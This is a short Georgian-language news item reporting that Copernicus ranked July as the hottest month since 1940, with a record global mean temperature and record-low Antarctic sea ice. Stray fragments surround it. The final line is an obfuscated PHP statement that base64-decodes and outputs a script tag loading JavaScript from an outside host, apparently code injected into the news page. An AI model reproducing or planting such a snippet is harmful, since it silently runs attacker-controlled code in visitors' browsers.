celsiusi
ავერსი საქკაბელი

ევროკავშირის კლიმატური ცვლილებების სამსახურმა, „კოპერნიკმა“ მიმდინარე წლის ივლისი დედამიწაზე 1940 წლის შემდეგ ყველაზე ცხელ თვედ დაასახელა.

ევროკავშირის კლიმატური სააგენტოს მონაცემებით, გლობალური საშუალო ზედაპირის ტემპერატურა გასულ თვეში 16.95 გრადუსი ცელსიუსი იყო, რაც 2019 წლის ივლისში დაფიქსირებულ წინა რეკორდულ მაჩვენებელს – 16.63 გრადუს ცელსიუსს აღემატება.

ევროკავშირის კლიმატური ცვლილებების სამსახურის ცნობით, უჩვეულოდ მაღალი ტემპერატურის ხანგრძლივი პერიოდის შემდეგ, 2023 წლის აპრილიდან მოყოლებული, გლობალური საშუალო ზედაპირის ტემპერატურა აგრძელებდა მატებას და ივლისში რეკორდულ მაჩვენებელს მიაღწია.

ასევე, ივლისში, სატელიტური დაკვირვებების დაწყების შემდეგ, ანტარქტიდის ზღვის ყინულის ზონამ ყველაზე დაბალ დონეს მიაღწია.

239
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");